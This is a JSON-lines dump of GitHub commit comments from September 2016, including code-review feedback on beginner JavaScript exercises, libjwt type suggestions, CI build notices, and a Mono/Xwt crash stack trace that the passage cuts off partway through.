{"id":"4620690484","type":"CommitCommentEvent","actor":{"login":"Annpettway"},"repo":{"name":"Annpettway/Python-Video"},"payload":{"comment":{"id":19180726,"position":null,"line":null,"path":null,"commit_id":"301041677e832a7583e312e458f21bf940a0a19c","created_at":"2016-09-26T21:54:21Z","updated_at":"2016-09-26T21:54:21Z","body":"Okay when I click on it, I go straight to YouTube....Go ahead and try it."}},"created_at":"2016-09-26T21:54:21Z"}
{"id":"4620692068","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"codeofcolors/rho_code_challenge_1"},"payload":{"comment":{"id":19180732,"position":6,"line":5,"path":"3-conditionals/if.js","commit_id":"cca7ba728bbfea7a736953170d4b31d59d84cac4","created_at":"2016-09-26T21:54:39Z","updated_at":"2016-09-26T21:54:39Z","body":"This equality check should occur after the variables, first and second, are created. Otherwise, they will be undefined at this point."}},"created_at":"2016-09-26T21:54:39Z"}
{"id":"4620694843","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"Lysautumn/rho_code_challenge_1"},"payload":{"comment":{"id":19180739,"position":16,"line":13,"path":"5-functions/func.js","commit_id":"87ac99271e78abab0db8a12bda14f671a462b958","created_at":"2016-09-26T21:55:12Z","updated_at":"2016-09-26T21:55:12Z","body":"To write this as a function expression, rather than a declaration, we could use:\r\n\r\n```\r\nvar consoleLog = function(x) {\r\n  console.log(x);\r\n}\r\n```"}},"created_at":"2016-09-26T21:55:12Z"}
{"id":"4620695273","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19180742,"position":null,"line":null,"path":null,"commit_id":"ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2","created_at":"2016-09-26T21:55:17Z","updated_at":"2016-09-26T21:55:17Z","body":"EMS (brianlball) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-ef34d3e80689fa2eb2e2d894dc1bd58f6e400df2-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-26T21:55:17Z"}
{"id":"4620696015","type":"CommitCommentEvent","actor":{"login":"phil65"},"repo":{"name":"phil65/skin.estuary"},"payload":{"comment":{"id":19180743,"position":null,"line":null,"path":null,"commit_id":"db52ec89d7eef8847808366185891cffc645d34f","created_at":"2016-09-26T21:55:26Z","updated_at":"2016-09-26T21:55:26Z","body":"hmm core is only prepared for max id 11? https://github.com/phil65/xbmc/blob/python_videoinfo/xbmc/windows/GUIWindowSystemInfo.cpp#L190"}},"created_at":"2016-09-26T21:55:26Z"}
{"id":"4620698001","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19180754,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T21:55:51Z","updated_at":"2016-09-26T21:55:51Z","body":"You need to be careful which gdk-sharp (2 or 3) you are linking to... API may have changed?"}},"created_at":"2016-09-26T21:55:51Z"}
{"id":"4620700933","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"airwolff/last"},"payload":{"comment":{"id":19180760,"position":18,"line":18,"path":"5-functions/func.js","commit_id":"603ca8dc0223d7d632d330dbb2125ea0f6c6200c","created_at":"2016-09-26T21:56:26Z","updated_at":"2016-09-26T21:56:26Z","body":"This question is asking for a function declaration; this could be written as\r\n\r\n```\r\nfunction test2(a) {\r\n  var answer = a / 2;\r\n  return answer;\r\n}\r\n```"}},"created_at":"2016-09-26T21:56:26Z"}
{"id":"4620706003","type":"CommitCommentEvent","actor":{"login":"theory"},"repo":{"name":"theory/pgtap"},"payload":{"comment":{"id":19180790,"position":null,"line":null,"path":null,"commit_id":"5ad76e25067463a863b12a13cfd3203f82595f9f","created_at":"2016-09-26T21:57:27Z","updated_at":"2016-09-26T21:57:27Z","body":"What changes? I have not had time to get my pg builds working for a while…"}},"created_at":"2016-09-26T21:57:27Z"}
{"id":"4620709688","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"airwolff/last"},"payload":{"comment":{"id":19180800,"position":26,"line":26,"path":"5-functions/func.js","commit_id":"603ca8dc0223d7d632d330dbb2125ea0f6c6200c","created_at":"2016-09-26T21:58:10Z","updated_at":"2016-09-26T21:58:10Z","body":"This question was confusingly worded, what we were looking for was:\r\n\r\n```JS\r\nconsole.log(test2(value(10,20)));\r\n```"}},"created_at":"2016-09-26T21:58:10Z"}
{"id":"4620710599","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"codeofcolors/rho_code_challenge_1"},"payload":{"comment":{"id":19180802,"position":9,"line":6,"path":"4-arrays/basics.js","commit_id":"cca7ba728bbfea7a736953170d4b31d59d84cac4","created_at":"2016-09-26T21:58:20Z","updated_at":"2016-09-26T21:58:20Z","body":"Review https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array#Accessing_array_elements"}},"created_at":"2016-09-26T21:58:20Z"}
{"id":"4620712490","type":"CommitCommentEvent","actor":{"login":"oresticouci"},"repo":{"name":"oresticouci/sportsConsulting"},"payload":{"comment":{"id":19180807,"position":null,"line":null,"path":null,"commit_id":"cc872a8f36e589ddb529cef2a65dccb5968f5fc2","created_at":"2016-09-26T21:58:43Z","updated_at":"2016-09-26T21:58:43Z","body":"Inicio"}},"created_at":"2016-09-26T21:58:43Z"}
{"id":"4620715209","type":"CommitCommentEvent","actor":{"login":"mulchy"},"repo":{"name":"airwolff/last"},"payload":{"comment":{"id":19180818,"position":23,"line":23,"path":"6-objects/literal.js","commit_id":"603ca8dc0223d7d632d330dbb2125ea0f6c6200c","created_at":"2016-09-26T21:59:15Z","updated_at":"2016-09-26T21:59:15Z","body":"This is a clever solution for this problem. Be careful using this with objects that have prototypes, as this will print out any inherited properties as well."}},"created_at":"2016-09-26T21:59:15Z"}
{"id":"4620716975","type":"CommitCommentEvent","actor":{"login":"benmcollins"},"repo":{"name":"benmcollins/libjwt"},"payload":{"comment":{"id":19180821,"position":25,"line":176,"path":"include/jwt.h","commit_id":"0bf1edaabc89fbc146c793e748e7d21d23cf3838","created_at":"2016-09-26T21:59:36Z","updated_at":"2016-09-26T21:59:36Z","body":"This really should be a `long`, or maybe just use `json_int_t` (which can either be `long` or `long long`)."}},"created_at":"2016-09-26T21:59:36Z"}
{"id":"4620718302","type":"CommitCommentEvent","actor":{"login":"gregvanl"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":19180825,"position":null,"line":null,"path":null,"commit_id":"3f08a8db4339f2f5642c2f8c26866d96b8e50773","created_at":"2016-09-26T21:59:52Z","updated_at":"2016-09-26T21:59:52Z","body":"We're trying to separate the platform from the OS and use Mac when discussing the platform generally and macOS for the OS. Hopefully this will help us avoid further churn when the OS versions change."}},"created_at":"2016-09-26T21:59:52Z"}
{"id":"4620718857","type":"CommitCommentEvent","actor":{"login":"antauth"},"repo":{"name":"codeofcolors/rho_code_challenge_1"},"payload":{"comment":{"id":19180828,"position":11,"line":8,"path":"4-arrays/builtins.js","commit_id":"cca7ba728bbfea7a736953170d4b31d59d84cac4","created_at":"2016-09-26T21:59:58Z","updated_at":"2016-09-26T21:59:58Z","body":"Missing the brackets for the function and also, the return statement.\r\n\r\n`arr.sort(function (b,c) { return b - c });`"}},"created_at":"2016-09-26T21:59:58Z"}
{"id":"4620721379","type":"CommitCommentEvent","actor":{"login":"B--B"},"repo":{"name":"AOSP-JF-MM/platform_manifest"},"payload":{"comment":{"id":19180836,"position":null,"line":null,"path":null,"commit_id":"417599f83cb6c343bd2ec69cd4b2e9f522123c6e","created_at":"2016-09-26T22:00:23Z","updated_at":"2016-09-26T22:00:23Z","body":"Ok, I've temporary reintroduced telephony-ext as it's still required somewhere in telephony repos, probably i miss something from cm but now i've no time to inspect what is it, i will take a look deeper next days, BTW this temporary fixes calls until i remove remaining telephony-ext dependences\r\n\r\nCall works, tested calls over BT and works well too (connected at the same time to my PC bt adapter and my BT headset), ROM will be available soon on dp :)"}},"created_at":"2016-09-26T22:00:23Z"}
{"id":"4620722347","type":"CommitCommentEvent","actor":{"login":"chrisdennis"},"repo":{"name":"chrisdennis/playframework"},"payload":{"comment":{"id":19180841,"position":null,"line":null,"path":null,"commit_id":"53879a91d205d8eb99d9de7970e9aa2356dc286b","created_at":"2016-09-26T22:00:33Z","updated_at":"2016-09-26T22:00:33Z","body":"So right now I'm at a loss here.  In order to inject the custom expiry policy we need to munge the users own configuration (while passing along any configured expiry policy as our own delegate - in case they are passing nulls, or their CM contains non-play caches).  In order to do so I filed ehcache/ehcache3#1465 which allows us to take a users Configuration object and seed a builder using it so we can tweak parts of their configuration.  However if we try and interleave this how will we get this back in to a form that 107 can consume (a URI).  Maybe it would just be simpler to either bifurcate the two implementations more?  Say we have a common set of cache access code, but use independent lifecycling code.  Or we focus more exclusively on an Ehcache focussed solution since 107 cannot implement the API \"correctly\", and then we can handle all this stuff much more gracefully.\r\n\r\nOne other thing I didn't look at was how we would go about gracefully selecting one mode or another based on the caching provider?  When will the Scala code trigger CNFE or the equivalent, and how do we translate this in to an ability to be selective about which code we use when?\r\n\r\nBtw, I think the Ehcache PR I created has utility outside of this task, so it (or some variant of it) should probably be merged regardless of what we decide on this particular issue."}},"created_at":"2016-09-26T22:00:33Z"}
{"id":"4620723433","type":"CommitCommentEvent","actor":{"login":"benmcollins"},"repo":{"name":"benmcollins/libjwt"},"payload":{"comment":{"id":19180842,"position":12,"line":596,"path":"libjwt/jwt.c","commit_id":"0bf1edaabc89fbc146c793e748e7d21d23cf3838","created_at":"2016-09-26T22:00:45Z","updated_at":"2016-09-26T22:00:45Z","body":"Depending on the actual type used for `val`, if it's not `json_int_t`, then cast `val` to that when passing to `json_integer()` else some platforms will get a compiler warning."}},"created_at":"2016-09-26T22:00:45Z"}
{"id":"4620732360","type":"CommitCommentEvent","actor":{"login":"c-holtermann"},"repo":{"name":"PF4Public/fetchmail"},"payload":{"comment":{"id":19180858,"position":null,"line":null,"path":null,"commit_id":"29ac3e5401c9c3a54ac3008249c4f4e1792214aa","created_at":"2016-09-26T22:02:34Z","updated_at":"2016-09-26T22:02:34Z","body":"Thanks, very useful ! Works fine for me !"}},"created_at":"2016-09-26T22:02:34Z"}
{"id":"4620737174","type":"CommitCommentEvent","actor":{"login":"dergraaf"},"repo":{"name":"dergraaf/library-builder"},"payload":{"comment":{"id":19180864,"position":56,"line":109,"path":"lbuild/environment.py","commit_id":"d0cd57f6571ffa95fe505ffccd2425ef700268ea","created_at":"2016-09-26T22:03:35Z","updated_at":"2016-09-26T22:03:35Z","body":"These are fairly generic filters which are fine as part of the lbuild system. Anything more specific should go into modm-platform. But I should rename them to \"lbuild.*\"."}},"created_at":"2016-09-26T22:03:35Z"}
{"id":"4620742707","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19180878,"position":12,"line":14,"path":"client/components/notice/index.jsx","commit_id":"e35019ca4d87f5bcc263736534586cf21127b4f2","created_at":"2016-09-26T22:04:39Z","updated_at":"2016-09-26T22:04:39Z","body":"Do you think there's value in naming it `UnwrappedNotice`, or do you think it could work just as well using `Notice` as the named export? The benefit of the latter might also be that you could remove the `displayName` property from the class (since React will infer from the variable name).\r\n\r\n```js\r\nexport const Notice = React.createClass( {\r\n\t// ...\r\n} );\r\n\r\nexport default localize( Notice );\r\n```\r\n\r\n```js\r\n// In typical usage:\r\nimport Notice from 'components/notice';\r\n\r\n// In tests or elsewhere unwrapped component needed:\r\nimport { Notice } from 'components/notice';\r\n```\r\n\r\nAlso, I forget, but do the tests blow up when trying to import the already-`localize`'d component?"}},"created_at":"2016-09-26T22:04:39Z"}
{"id":"4620743228","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19180881,"position":null,"line":null,"path":null,"commit_id":"33a75609f062bff89740d793798bd70826d9acc3","created_at":"2016-09-26T22:04:46Z","updated_at":"2016-09-26T22:04:46Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 270](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1236&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2016-09-26T22:04:46Z"}
{"id":"4620745880","type":"CommitCommentEvent","actor":{"login":"mrmlnc"},"repo":{"name":"Microsoft/vscode-docs"},"payload":{"comment":{"id":19180883,"position":null,"line":null,"path":null,"commit_id":"3f08a8db4339f2f5642c2f8c26866d96b8e50773","created_at":"2016-09-26T22:05:20Z","updated_at":"2016-09-26T22:05:20Z","body":"Yes, you're right 👍 I am sorry for disturbing you."}},"created_at":"2016-09-26T22:05:20Z"}
{"id":"4620747167","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19180886,"position":null,"line":null,"path":null,"commit_id":"33a75609f062bff89740d793798bd70826d9acc3","created_at":"2016-09-26T22:05:36Z","updated_at":"2016-09-26T22:05:36Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 270](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1236&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **UNKNOWN**\nSummary: Canceled Build time: 00:00:51"}},"created_at":"2016-09-26T22:05:36Z"}
{"id":"4620749306","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":19180892,"position":66,"line":250,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/internal/PhenotipsFamilyRepository.java","commit_id":"f542dfe137c27102e80875b7b53a2f648da8af08","created_at":"2016-09-26T22:06:04Z","updated_at":"2016-09-26T22:06:04Z","body":"creator is not null here"}},"created_at":"2016-09-26T22:06:04Z"}
{"id":"4620749806","type":"CommitCommentEvent","actor":{"login":"aduth"},"repo":{"name":"Automattic/wp-calypso"},"payload":{"comment":{"id":19180893,"position":15,"line":15,"path":"client/components/notice/test/index.js","commit_id":"e35019ca4d87f5bcc263736534586cf21127b4f2","created_at":"2016-09-26T22:06:10Z","updated_at":"2016-09-26T22:06:10Z","body":"Do you need a fake DOM? At a glance, it doesn't appear that anything in `<Notice />` depends on the DOM being present. This is reaffirmed by the fact that this doesn't explode, since you'd typically need to import the component under test _after_ calling `useFakeDom`."}},"created_at":"2016-09-26T22:06:10Z"}
{"id":"4620751648","type":"CommitCommentEvent","actor":{"login":"HinTak"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19180904,"position":null,"line":null,"path":null,"commit_id":"c58c6f22fe4346cc4a97b4cca21ca0a721f43927","created_at":"2016-09-26T22:06:32Z","updated_at":"2016-09-26T22:06:32Z","body":"Oh, it is quite horrible. I get not only an exception, but also a core-dump. On fedora 24, but with my own upgrade of mono to 4.4.2 (taken from fc25, I think).\r\n\r\n```\r\n$ mono Gtk3Test.exe\r\nMarshaling realize signal\r\nException in Gtk# callback delegate\r\n  Note: Applications can use GLib.ExceptionManager.UnhandledException to handle the exception.\r\nSystem.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.NullReferenceException: Object reference not set to an instance of an object\r\n  at Xwt.GtkBackend.LabelBackend.SetFormattedText (Xwt.FormattedText text) <0x413f6290 + 0x00114> in <filename unknown>:0 \r\n  at Xwt.GtkBackend.LabelBackend.HandleStyleUpdate (System.Object sender, System.EventArgs e) <0x413dd7a0 + 0x0003f> in <filename unknown>:0 \r\n  at (wrapper managed-to-native) System.Reflection.MonoMethod:InternalInvoke (System.Reflection.MonoMethod,object,object[],System.Exception&)\r\n  at System.Reflection.MonoMethod.Invoke (System.Object obj, BindingFlags invokeAttr, System.Reflection.Binder binder, System.Object[] parameters, System.Globalization.CultureInfo culture) <0x4138cbb0 + 0x000a3> in <filename unknown>:0 \r\n  --- End of inner exception stack trace ---\r\n  at System.Reflection.MonoMethod.Invoke (System.Object obj, BindingFlags invokeAttr, System.Reflection.Binder binder, System.Object[] parameters, System.Globalization.CultureInfo culture) <0x4138cbb0 + 0x00107> in <filename unknown>:0 \r\n  at System.Reflection.MethodBase.Invoke (System.Object obj, System.Object[] parameters) <0x4138cb70 + 0x0002a> in <filename unknown>:0 \r\n  at System.Delegate.DynamicInvokeImpl (System.Object[] args) <0x413dd3b0 + 0x0028b> in <filename unknown>:0 \r\n  at System.MulticastDelegate.DynamicInvokeImpl (System.Object[] args) <0x413dd2e0 + 0x00037> in <filename unknown>:0 \r\n  at System.Delegate.DynamicInvoke (System.Object[] args) <0x413dd2b0 + 0x00018> in <filename unknown>:0 \r\n  at GLib.Signal.ClosureInvokedCB (System.Object o, GLib.ClosureInvokedArgs args) <0x413dd1e0 + 0x000a7> in <filename unknown>:0 \r\n  at GLib.SignalClosure.Invoke (GLib.ClosureInvokedArgs args) <0x413dd1a0 + 0x0002f> in <filename unknown>:0 \r\n  at GLib.SignalClosure.MarshalCallback (IntPtr raw_closure, IntPtr return_val, UInt32 n_param_vals, IntPtr param_values, IntPtr invocation_hint, IntPtr marshal_data) <0x413dc490 + 0x002d3> in <filename unknown>:0 \r\n  at GLib.ExceptionManager.RaiseUnhandledException (System.Exception e, Boolean is_terminal) [0x00000] in <filename unknown>:0 \r\n  at GLib.SignalClosure.MarshalCallback (IntPtr raw_closure, IntPtr return_val, UInt32 n_param_vals, IntPtr param_values, IntPtr invocation_hint, IntPtr marshal_data) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.gtksharp_container_invoke_gtk_callback (IntPtr , IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container+CallbackInvoker.Invoke (Gtk.Widget w) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.CustomContainer.ForAll (Boolean includeInternals, Gtk.Callback callback) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.Forall_cb (IntPtr container, Boolean include_internals, IntPtr cb, IntPtr data) [0x00000] in <filename unknown>:0 \r\n  at System.Object.wrapper_native_0x7f898d5e5760 (IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.gtk_widget_set_parent (IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.set_Parent (Gtk.Widget value) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.CustomContainer.OnAdded (Gtk.Widget widget) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.Added_cb (IntPtr inst, IntPtr widget) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.gtk_container_add (IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.Add (Gtk.Widget widget) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.CustomContainer.Add (Xwt.Widget w, Gtk.Widget gw) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.BoxBackend.Add (IWidgetBackend widget) [0x00000] in <filename unknown>:0 \r\n  at Xwt.Box.OnAdd (Xwt.Widget child, Xwt.BoxPlacement placement) [0x00000] in <filename unknown>:0 \r\n  at Xwt.Box+WidgetBackendHost.AddedItem (Xwt.BoxPlacement item, Int32 index) [0x00000] in <filename unknown>:0 \r\n  at Xwt.ChildrenCollection`1[T].InsertItem (Int32 index, Xwt.T item) [0x00000] in <filename unknown>:0 \r\n  at System.Collections.ObjectModel.Collection`1[T].Add (System.Collections.ObjectModel.T item) [0x00000] in <filename unknown>:0 \r\n  at Xwt.Box.Pack (Xwt.Widget widget, Nullable`1 expand, WidgetPlacement align, PackOrigin ptype) [0x00000] in <filename unknown>:0 \r\n  at Xwt.Box.PackStart (Xwt.Widget widget, Boolean expand) [0x00000] in <filename unknown>:0 \r\n  at Samples.MainWindow.HandleSamplesTreeSelectionChanged (System.Object sender, System.EventArgs e) [0x00000] in <filename unknown>:0 \r\n  at Xwt.TreeView.OnSelectionChanged (System.EventArgs a) [0x00000] in <filename unknown>:0 \r\n  at Xwt.TreeView+WidgetBackendHost.OnSelectionChanged () [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.TableViewBackend.<HandleWidgetSelectionChanged>m__0 () [0x00000] in <filename unknown>:0 \r\n  at Xwt.Toolkit.Invoke (System.Action a) [0x00000] in <filename unknown>:0 \r\n  at Xwt.Backends.ApplicationContext.InvokeUserCode (System.Action a) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.TableViewBackend.HandleWidgetSelectionChanged (System.Object sender, System.EventArgs e) [0x00000] in <filename unknown>:0 \r\n  at System.Reflection.MonoMethod.InternalInvoke (System.Reflection.MonoMethod , System.Object , System.Object[] , System.Exception& ) [0x00000] in <filename unknown>:0 \r\n  at System.Reflection.MonoMethod.Invoke (System.Object obj, BindingFlags invokeAttr, System.Reflection.Binder binder, System.Object[] parameters, System.Globalization.CultureInfo culture) [0x00000] in <filename unknown>:0 \r\n  at System.Reflection.MethodBase.Invoke (System.Object obj, System.Object[] parameters) [0x00000] in <filename unknown>:0 \r\n  at System.Delegate.DynamicInvokeImpl (System.Object[] args) [0x00000] in <filename unknown>:0 \r\n  at System.MulticastDelegate.DynamicInvokeImpl (System.Object[] args) [0x00000] in <filename unknown>:0 \r\n  at System.Delegate.DynamicInvoke (System.Object[] args) [0x00000] in <filename unknown>:0 \r\n  at GLib.Signal.ClosureInvokedCB (System.Object o, GLib.ClosureInvokedArgs args) [0x00000] in <filename unknown>:0 \r\n  at GLib.SignalClosure.Invoke (GLib.ClosureInvokedArgs args) [0x00000] in <filename unknown>:0 \r\n  at GLib.SignalClosure.MarshalCallback (IntPtr raw_closure, IntPtr return_val, UInt32 n_param_vals, IntPtr param_values, IntPtr invocation_hint, IntPtr marshal_data) [0x00000] in <filename unknown>:0 \r\n  at System.Object.wrapper_native_0x7f898d7e78b0 (IntPtr , IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Application.gtk_main () [0x00000] in <filename unknown>:0 \r\n  at Gtk.Application.Run () [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.GtkEngine.RunApplication () [0x00000] in <filename unknown>:0 \r\n  at Xwt.Application.<Run>m__0 () [0x00000] in <filename unknown>:0 \r\n  at Xwt.Toolkit.InvokePlatformCode (System.Action a) [0x00000] in <filename unknown>:0 \r\n  at Xwt.Application.Run () [0x00000] in <filename unknown>:0 \r\n  at Samples.App.Run (ToolkitType type) [0x00000] in <filename unknown>:0 \r\n  at GtkTest.MainClass.Main (System.String[] args) [0x00000] in <filename unknown>:0 \r\nException in Gtk# callback delegate\r\n  Note: Applications can use GLib.ExceptionManager.UnhandledException to handle the exception.\r\nSystem.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary.\r\n  at System.Collections.Generic.Dictionary`2[TKey,TValue].get_Item (System.Collections.Generic.TKey key) <0x413d1980 + 0x0005b> in <filename unknown>:0 \r\n  at GLib.Object.TryGetObject (IntPtr o) <0x413d1820 + 0x000ab> in <filename unknown>:0 \r\n  at Gtk.Container.Forall_cb (IntPtr container, Boolean include_internals, IntPtr cb, IntPtr data) <0x413d15e0 + 0x00043> in <filename unknown>:0 \r\n  at GLib.ExceptionManager.RaiseUnhandledException (System.Exception e, Boolean is_terminal) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Container.Forall_cb (IntPtr container, Boolean include_internals, IntPtr cb, IntPtr data) [0x00000] in <filename unknown>:0 \r\n  at System.Object.wrapper_native_0x7f898d5e5720 (IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.gtk_widget_destroy (IntPtr ) [0x00000] in <filename unknown>:0 \r\n  at Gtk.Widget.Destroy () [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.WidgetBackend.Dispose (Boolean disposing) [0x00000] in <filename unknown>:0 \r\n  at Xwt.GtkBackend.WidgetBackend.Dispose () [0x00000] in <filename unknown>:0 \r\n  at Xwt.Widget.Dispose (Boolean disposing) [0x00000] in <filename unknown>:0 \r\n  at System.ComponentModel.Component.Dispose () [0x00000] in <filename unknown>:0 \r\n  at Xwt.Window.Dispose (Boolean disposing) [0x00000] in <filename unknown>:0 \r\n  at Samples.MainWindow.Dispose (Boolean disposing) [0x00000] in <filename unknown>:0 \r\n  at System.ComponentModel.Component.Finalize () [0x00000] in <filename unknown>:0 \r\n* Assertion at gc.c:867, condition `finalizer_thread_exited' not met\r\n\r\nStacktrace:\r\n\r\n  at <unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) System.Environment.Exit (int) <0x00058>\r\n  at GLib.ExceptionManager.RaiseUnhandledException (System.Exception,bool) <0x000f3>\r\n  at GLib.SignalClosure.MarshalCallback (intptr,intptr,uint,intptr,intptr,intptr) <0x0080b>\r\n  at (wrapper native-to-managed) GLib.SignalClosure.MarshalCallback (intptr,intptr,uint,intptr,intptr,intptr) <0x000a3>\r\n  at <unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) Gtk.Container.gtksharp_container_invoke_gtk_callback (intptr,intptr,intptr) <0x0006b>\r\n  at Gtk.Container/CallbackInvoker.Invoke (Gtk.Widget) <0x00027>\r\n  at (wrapper unbox) Gtk.Container/CallbackInvoker.Invoke (Gtk.Widget) <0x0001b>\r\n  at Xwt.GtkBackend.CustomContainer.ForAll (bool,Gtk.Callback) <0x00076>\r\n  at Gtk.Container.Forall_cb (intptr,bool,intptr,intptr) <0x00183>\r\n  at (wrapper native-to-managed) Gtk.Container.Forall_cb (intptr,int,intptr,intptr) <0x0009f>\r\n  at <unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) object.wrapper_native_0x7f898d5e5760 (intptr) <0x00058>\r\n  at (wrapper native-to-managed) object.wrapper_native_0x7f898d5e5760 (intptr) <0x0006f>\r\n  at <unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) Gtk.Widget.gtk_widget_set_parent (intptr,intptr) <0x00065>\r\n  at Gtk.Widget.set_Parent (Gtk.Widget) <0x00037>\r\n  at Xwt.GtkBackend.CustomContainer.OnAdded (Gtk.Widget) <0x00023>\r\n  at Gtk.Container.Added_cb (intptr,intptr) <0x000b0>\r\n  at (wrapper native-to-managed) Gtk.Container.Added_cb (intptr,intptr) <0x0007b>\r\n  at <unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) Gtk.Container.gtk_container_add (intptr,intptr) <0x00065>\r\n  at Gtk.Container.Add (Gtk.Widget) <0x00037>\r\n  at Xwt.GtkBackend.CustomContainer.Add (Xwt.Widget,Gtk.Widget) <0x001af>\r\n  at Xwt.GtkBackend.BoxBackend.Add (Xwt.Backends.IWidgetBackend) <0x00087>\r\n  at Xwt.Box.OnAdd (Xwt.Widget,Xwt.BoxPlacement) <0x000e0>\r\n  at (wrapper remoting-invoke-with-check) Xwt.Box.OnAdd (Xwt.Widget,Xwt.BoxPlacement) <0x00077>\r\n  at Xwt.Box/WidgetBackendHost.AddedItem (Xwt.BoxPlacement,int) <0x000d7>\r\n  at Xwt.ChildrenCollection`1<T_REF>.InsertItem (int,T_REF) <0x00052>\r\n  at System.Collections.ObjectModel.Collection`1<T_REF>.Add (T_REF) <0x00098>\r\n  at Xwt.Box.Pack (Xwt.Widget,System.Nullable`1<bool>,Xwt.WidgetPlacement,Xwt.PackOrigin) <0x00153>\r\n  at Xwt.Box.PackStart (Xwt.Widget,bool) <0x00067>\r\n  at (wrapper remoting-invoke-with-check) Xwt.Box.PackStart (Xwt.Widget,bool) <0x00077>\r\n  at Samples.MainWindow.HandleSamplesTreeSelectionChanged (object,System.EventArgs) <0x001fb>\r\n  at Xwt.TreeView.OnSelectionChanged (System.EventArgs) <0x00035>\r\n  at Xwt.TreeView/WidgetBackendHost.OnSelectionChanged () <0x00028>\r\n  at Xwt.GtkBackend.TableViewBackend.<HandleWidgetSelectionChanged>m__0 () <0x00025>\r\n  at Xwt.Toolkit.Invoke (System.Action) <0x00062>\r\n  at Xwt.Backends.ApplicationContext.InvokeUserCode (System.Action) <0x00023>\r\n  at Xwt.GtkBackend.TableViewBackend.HandleWidgetSelectionChanged (object,System.EventArgs) <0x000b3>\r\n  at (wrapper runtime-invoke) <Module>.runtime_invoke_void__this___object_object (object,intptr,intptr,intptr) <0x000eb>\r\n  at <unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) System.Reflection.MonoMethod.InternalInvoke (System.Reflection.MonoMethod,object,object[],System.Exception&) <0x00073>\r\n  at System.Reflection.MonoMethod.Invoke (object,System.Reflection.BindingFlags,System.Reflection.Binder,object[],System.Globalization.CultureInfo) <0x000a3>\r\n  at System.Reflection.MethodBase.Invoke (object,object[]) <0x0002a>\r\n  at System.Delegate.DynamicInvokeImpl (object[]) <0x0028b>\r\n  at System.MulticastDelegate.DynamicInvokeImpl (object[]) <0x00037>\r\n  at System.Delegate.DynamicInvoke (object[]) <0x00018>\r\n  at GLib.Signal.ClosureInvokedCB (object,GLib.ClosureInvokedArgs) <0x000a7>\r\n  at GLib.SignalClosure.Invoke (GLib.ClosureInvokedArgs) <0x0002f>\r\n  at GLib.SignalClosure.MarshalCallback (intptr,intptr,uint,intptr,intptr,intptr) <0x002d3>\r\n  at (wrapper native-to-managed) GLib.SignalClosure.MarshalCallback (intptr,intptr,uint,intptr,intptr,intptr) <0x000a3>\r\n  at <unknown> <0xffffffff>\r\n  at (wrapper managed-to-native) object.wrapper_native_0x7f898d7e78b0 (intptr,intptr) <0x0005e>\r\n  at (wrapper native-to-managed) object.wrapper_native_0x7f898d7e78b0 (intptr,intptr) <0x0007f>\r\n  at 